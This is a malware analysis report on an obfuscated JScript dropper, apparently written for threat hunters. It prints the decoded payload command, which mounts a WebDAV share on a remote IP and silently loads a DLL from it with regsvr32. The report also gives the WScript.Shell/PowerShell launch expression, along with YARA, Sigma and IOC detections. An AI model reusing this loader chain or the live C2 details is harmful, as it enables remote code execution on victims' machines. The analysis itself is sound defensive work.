typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-25updated2026-07-25scriptdropperc2obfuscationdefense-evasionexecution
SHA-256: 27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55

unclassified-js-webdav-dropper: 27e35f3c — 1.74 MB JScript with 1,838-char variable-name padding, 62-entry noise-key dictionary, PowerShell -EncodedCommand wrapper

Executive Summary

The one-hundred-and-fifth confirmed sibling in the WebDAV dropper family. At 1.74 MB it is the largest observed sample, inflated by a 1,838-character variable name and 407 bracket-reference concatenations assembling a PowerShell -EncodedCommand payload. The decoded payload mounts \\94.159.113.79@8888\DavWWWRoot\ via net use and silently registers 27729456617937.dll via regsvr32 /s. A timeout 1 anti-emulation gate is present inside the encoded command. Same C2 IP as five prior siblings (fe261d49, be172014, dc76a67d, 9665f822, 26666aa2).

What It Is

  • SHA-256: 27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55
  • File size: 1,787,048 bytes (1.74 MB) ^[file.txt]
  • Format: Single-line ASCII JScript, no line terminators ^[file.txt]
  • Preliminary family: unclassified-js-webdav-dropper (105th confirmed sibling)
  • Obfuscation: JScript dictionary lookup-table (62 entries, random noise keys), 1,838-character extreme variable-name padding
  • Execution: PowerShell -EncodedCommand wrapper → cmd /c net use + regsvr32 /s
  • Static only — no CAPE detonation (JScript not a supported binary class) ^[dynamic-analysis.md]

How It Works

  1. A single object declaration with a 1,838-character lowercase-alphabet variable name is assigned an object literal with 62 properties. Each property key is a random noise string (1,322–2,276 chars); each value is a single-character string literal. ^[strings.txt]
  2. A payload assembly region uses 407 bracket-reference concatenations (var['noise_key1']+var['noise_key2']+...) to construct a string that is passed to Function(''+assembled_string+'',0,false). ^[strings.txt]
  3. The assembled expression evaluates to: (new Function('return this'))()['WScript']['CreateObject']('WScript.Shell')['run']('powershell -EncodedCommand <base64>') ^[strings.txt]
  4. The Base64 payload decodes from UTF-16LE to: timeout 1;cmd /c net use \\94.159.113.79@8888\davwwwroot\;cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\27729456617937.dll

Key structural observation: this sample wraps the command in a PowerShell -EncodedCommand layer (UTF-16LE Base64), unlike siblings like f2316aaf or f346e80d that invoke WScript.Shell.run() directly. The timeout 1 anti-emulation gate is embedded inside the encoded payload, not at the JScript layer.

C2 Infrastructure

Indicator Value
WebDAV mount \\94.159.113.79@8888\DavWWWRoot\
Payload DLL 27729456617937.dll
Execution regsvr32 /s \\94.159.113.79@8888\DavWWWRoot\27729456617937.dll
C2 subnet 94.159.113.0/24 (twelve confirmed siblings)
Anti-emulation timeout 1 (inside PowerShell payload)

Interesting Tidbits

  • Largest file in family: At 1.74 MB, this is the biggest sibling observed (vs. 1.25 MB for 86140a690cfd). The bloat is purely from the 1,838-char variable name and 407 bracket-reference concatenations with extremely long keys. ^[strings.txt]
  • PowerShell EncodedCommand wrapper: Unlike the direct-execution siblings (f2316aaf, f346e80d, ff3c6d0c), this sample encodes the payload in UTF-16LE and invokes it via powershell -EncodedCommand. This adds one hop in the parent-child chain (wscript.exe → powershell.exe → cmd.exe) and may evade simpler WScript.Shell-run telemetry. ^[strings.txt]
  • timeout 1 inside encoded payload: The anti-emulation gate is not visible at the JScript layer; it lives inside the Base64 blob, making static detection harder for tools that only surface the outer script.
  • Sixth sibling on 94.159.113.79: Joins fe261d49 (68th), be172014 (74th), dc76a67d (79th), 9665f822 (102nd), and 26666aa2 (104th) on this exact IP. The subnet has been the dominant C2 block since the 64th sibling. ^[entities/unclassified-js-webdav-dropper.md]

Deployable Signatures

YARA rule

rule WEBDAV_JS_DictDropper_27e35f3c {
    meta:
        description = "JScript WebDAV dropper with 62-entry dictionary lookup-table obfuscation, extreme variable-name padding, and PowerShell EncodedCommand wrapper"
        author = "PacketPursuit"
        date = "2026-07-25"
        hash = "27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55"
    strings:
        $a = /[a-z]{1800,}=\[\];/
        $b = "Function(''"
        $c = "DavWWWRoot"
        $d = "EncodedCommand"
        $e = "regsvr32"
        $f = /net use \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}@8888/
    condition:
        all of ($a,$b,$c,$d,$e) or ($f and $c and $e)
}

Behavioral hunt query (Sigma-like)

title: WebDAV JS Dropper - PowerShell EncodedCommand + regsvr32 UNC Execution
detection:
  selection:
    ParentImage|endswith:
      - '\wscript.exe'
      - '\cscript.exe'
    CommandLine|contains|all:
      - 'powershell'
      - '-EncodedCommand'
    CommandLine|re:
      - '(?i)regsvr32.*\\\\[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+.*davwwwroot.*\.dll'
  condition: selection

IOC list

Type Value
SHA-256 27e35f3c0ef769b366b545186e8dc959273fdda68839e3fa3ed99a02b3fa4b55
C2 IP 94.159.113.79:8888
Payload DLL 27729456617937.dll
WebDAV UNC \\94.159.113.79@8888\DavWWWRoot\

Behavioral fingerprint

This sample is a single-line JScript blob (1.74 MB) declaring an object with an extremely long lowercase-alphabet variable name (~1,800 chars), 62 noise-key properties mapping to single characters, and 407 bracket-index lookups assembling a PowerShell -EncodedCommand payload. The encoded command decodes to timeout 1; net use mounting a WebDAV share on 94.159.113.79:8888, followed by regsvr32 /s loading a remote DLL. No sandbox gate at the JScript layer; anti-emulation is hidden inside the Base64 blob.

Detection Signatures

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) JScript/WScript carrier ^[strings.txt]
Execution T1059.001 (PowerShell) powershell -EncodedCommand wrapper ^[strings.txt]
Execution T1218.010 (Regsvr32) regsvr32 /s \\C2\share\*.dll ^[strings.txt]
Defense Evasion T1218 (System Binary Proxy Execution) powershell.exe and regsvr32 are signed system binaries ^[strings.txt]
Defense Evasion T1027 (Obfuscated Files or Information) 62-entry dictionary lookup-table obfuscation, UTF-16LE Base64 payload ^[strings.txt]
Defense Evasion T1497.001 (Virtualization/Sandbox Evasion) timeout 1 anti-emulation gate inside encoded payload ^[strings.txt]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP (\\94.159.113.79@8888\DavWWWRoot\) ^[strings.txt]
Command & Control T1105 (Ingress Tool Transfer) net use mounts share; regsvr32 fetches and loads remote DLL ^[strings.txt]

References

Provenance

Analysis performed 2026-07-25 on pp-hermes (<lan>). Tools: Python 3.11 regex extraction (manual dictionary extraction, UTF-16LE Base64 decode), file (file.txt), strings (strings.txt). No CAPE detonation — JScript is not a supported binary class. ^[sample 27e35f3c/file.txt] ^[sample 27e35f3c/strings.txt]